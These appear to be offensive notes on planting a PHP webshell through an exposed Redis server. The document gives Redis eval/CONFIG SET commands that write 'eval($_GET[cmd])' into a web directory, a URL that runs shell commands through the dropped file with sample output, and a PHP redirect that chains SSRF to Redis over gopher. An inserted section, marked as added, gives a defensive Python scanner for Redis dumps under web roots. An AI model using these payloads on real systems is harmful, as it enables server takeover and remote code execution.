Webshell upload via Redis
webshell upload
```bash
FLUSHALL
eval 'redis.call("set", "<?php eval($_GET[cmd]); ?>", "test");
redis.call("config", "set", "dir", "/var/www/html/cache/");
redis.call("config", "set", "dbfilename", "exploit.php");' 0
save
quit
```
```
http://192.168.13.133/cache/exploit.php?cmd=echo%20`ls%20-l`;
```
```
REDIS0008� redis-ver4.0.2� redis-bits�@�ctime�*��Y�used-mem���repl-stream-db���repl-id(b256256c124e6f5671af7f82508ead2baa3b784d�repl-offset��aof-preamble���total 8 -rw-r--r-- 1 root root 28 Oct 5 13:34 aaa.php -rw-r--r-- 1 root root 221 Oct 5 13:25 exploit.php testatest��!����~
```
```bash
eval 'redis.call("set", "a", "test");' 0
$-1
get a
$4
test
```
redis.conf
```bash
# The filename where to dump the DB
dbfilename dump.rdb
# The working directory.
#
# The DB will be written inside this directory, with the filename specified
# above using the 'dbfilename' configuration directive.
#
# The Append Only File will also be created inside this directory.
#
# Note that you must specify a directory here, not a file name.
dir ./
```
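A defender-side check for the technique in this section, as an added example that is not part of the original post: because `save` writes a full RDB snapshot, the dropped file begins with the `REDIS` magic visible in the response above, so any file under a web root carrying that header is worth flagging. The function names and the sample files are constructed for illustration.

```python
import os
import re
import tempfile

# RDB snapshots begin with the ASCII magic "REDIS" plus a 4-digit format version.
RDB_MAGIC = re.compile(rb"^REDIS(\d{4})")
# Open tags a PHP interpreter would execute even inside a binary dump.
PHP_TAG = re.compile(rb"<\?(?:php|=)", re.IGNORECASE)


def inspect_file(path, head_bytes=1 << 20):
    """Return a finding dict if the file is an RDB snapshot, else None."""
    with open(path, "rb") as fh:
        data = fh.read(head_bytes)  # only the first 1 MiB is searched for tags
    m = RDB_MAGIC.match(data)
    if not m:
        return None
    return {"path": path, "rdb_version": int(m.group(1)),
            "has_php_tag": bool(PHP_TAG.search(data))}


def scan_webroot(root):
    """Walk a web root and report every file that is really a Redis dump."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            try:
                finding = inspect_file(full)
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    # Constructed sample: a fake web root with one normal page and one RDB-shaped file.
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "cache"))
        with open(os.path.join(root, "index.php"), "wb") as fh:
            fh.write(b"<?php echo 'hello'; ?>")
        with open(os.path.join(root, "cache", "exploit.php"), "wb") as fh:
            fh.write(b"REDIS0008\xfa\tredis-ver\x054.0.2\xfe\x00<?php /* constructed */ ?>\xff")
        for f in scan_webroot(root):
            print(f)
```

An RDB header inside a served directory is a finding whether or not a script tag is present, since it means the Redis process was able to write there.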
Chaining with SSRF
Note: Redis does not support HTTP, so gopher must be used.
```php
<?php
header("Location: gopher://127.0.0.1:6379/_FLUSHALL%0d%0aeval%20%27redis.call%28%22set%22%2C%20%22%3C%3Fphp%20eval%28%24_GET%5Bcmd%5D%29%3B%20%3F%3E%22%2C%20%22test%22%29%3B%20redis.call%28%22config%22%2C%20%22set%22%2C%20%22dir%22%2C%20%22/var/www/html/cache/%22%29%3B%20redis.call%28%22config%22%2C%20%22set%22%2C%20%22dbfilename%22%2C%20%22exploit.php%22%29%3B%27%200%0d%0asave%0d%0aquit%0d%0a");
?>
```